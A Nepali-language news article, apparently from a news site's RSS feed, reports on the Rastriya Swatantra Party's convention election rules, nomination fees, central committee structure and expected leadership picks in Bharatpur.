यसैबीच, रास्वपा निर्वाचन आयोगले एक सूचना जारी गरेर उम्मेदवारको प्रस्तावक र समर्थक उम्मेदवार हुन नपाउने जनाएको हो । निर्वाचन आयोगले पार्टी सभापतिका उम्मेदवारका लागि १ जना प्रस्तावक र ५१ जना समर्थक अनिवार्य गरेको छ । यस्तै अन्य केन्द्रीय सदस्यको हकमा १ जना प्रस्ताव र २१ जना समर्थक चाहिन्छ । त्यस्तै, रास्वपाको केन्द्रीय सभापतिका लागि उम्मेदवारी दिँदा ५१ जना हजार, पदाधिकारीका लागि ४१ हजार र केन्द्रीय सदस्यले २१ हजार रुपैयाँ बुझाउनु पर्दछ ।
प्रस्तावक र समर्थकहरुको नाम, सम्पर्क नम्बर र हस्ताक्षर अनिवार्य हुनुपर्ने केन्द्रीय निर्वाचन आयोगका प्रमुख भुवन केसीले जारी गरेको सूचनामा उल्लेख छ । नयाँ नियमले एक जनाका लागि २२ जनाको उम्मेदवारी रोकिने स्थिति उत्पन्न भएको छ । केन्द्रीय सदस्यको उम्मेदवारी दिन चाहने व्यक्तिले एक जना प्रस्तावक र २१ जना समर्थकसहित २२ जना महाधिवशेन प्रतिनिधि जुटाउनुपर्नेछ । ती २२ जनाले आफू उम्मेदवारी दिन पाउने छैनन् ।
उम्मेदवारका प्रस्तावक र समर्थकहरूका लागि लागू गरिएको नियमले केन्द्रीय सदस्यमा बढ्दै गएको आकांक्षीहरूको लर्को कटौती हुने संकेत देखिएको छ । रास्वपाको पहिलो महाधिवेशनमा केन्द्रीय सदस्यका आकांक्षी लगातार बढ्दै गएपछि त्यसलाई कटौती गर्ने उद्देश्यले यो नियम ल्याइएको नेताहरूको भनाइ छ ।
अहिलेसम्म महाधिवेशन प्रतिनिधि संख्या ४३ सय नाघेको छ । तीमध्ये झन्डै हजार जना केन्द्रीय सदस्यका आकांक्षी देखिएका छन् ।
एक जनाको प्रस्तावक बसेपछि अर्को व्यक्तिको प्रस्तावक बस्न पाइँदैन तर समर्थक बस्न भने रोक लगाइएको छैन । प्रस्तावक र समर्थक हुने व्यक्ति पार्टीको महाविधेशन प्रतिनिधि भएकै हुनुपर्दछ ।
रास्वपाको संशोधित विधान अनुसार १५१ जनाको केन्द्रीय समिति हुनेछ । महाधिवेशनबाट ९९ जना निर्वाचित केन्द्रीय सदस्य आउने छन् भने सभापतिलाई मनोनित गर्ने अधिकार ५१ जना छुट्याइएको छ ।
विधान अनुसार १९ पदाधिकारीको व्यवस्था गरिएको छ । सभापति, उपसभापति ३, महामन्त्री २, सहमहामन्त्री ५, कोषाध्यक्ष १, सहकोषाध्यक्ष २, प्रवक्ता १ र सहप्रवक्ता ३ जना पदाधिकारी हुनेछन् । सभापति रवि लामिछाने, वरिष्ठ नेता बालेन शाह र एक उपसभापतिमा डा. स्वर्णिम वाग्ले सर्वसम्मत चयन हुने बताइएको छ ।
रास्वपाको विधान अनुसार पदाधिकारीका अन्य पदमा पनि सर्वसम्मत बनाउने प्रयत्न भइरहेको छ । सर्वसम्मत हुने अवस्था बन्न नसके उपसभापति १, महामन्त्री १, सहमहामन्त्री ३ जनामा निर्वाचन हुनेछ ।
रास्वपाको विधान अनुसार पहिलो चरणमा सभापति र निर्वाचनबाट आउने केन्द्रीय सदस्यका लागि मतदान गर्नुपर्दछ । दोस्रो चरणमा पदाधिकारीका लागि मतदान हुनेछ । केन्द्रीय सदस्यमा निर्वाचित भएर पदाधिकारीमा प्रतिस्पर्धा गर्न नेताहरूले मत माग्ने कार्यलाई तीव्रता दिएका छन् ।
महाधिवेशनको व्यवस्थापन पक्ष फितलो हुँदा र समय लम्बिदै जादा प्रतिनिधिहरूमा चिन्ता छाउन थालेको छ । उम्मेदवार दर्ता र निर्वाचन प्रक्रियामा जाँदा पनि कार्यतालिका यसै गरी प्रभावित भयो भने प्रतिनिधिको बसाईं थप लम्बिन सक्ने स्थिति छ ।
बन्दसत्र भरतपुरको उद्योग सङ्घ परिसरमा रहेको प्रदर्शनी केन्द्रमा हुनेछ ।
]]>https://www.antaranganews.com/?feed=rss2&p=495780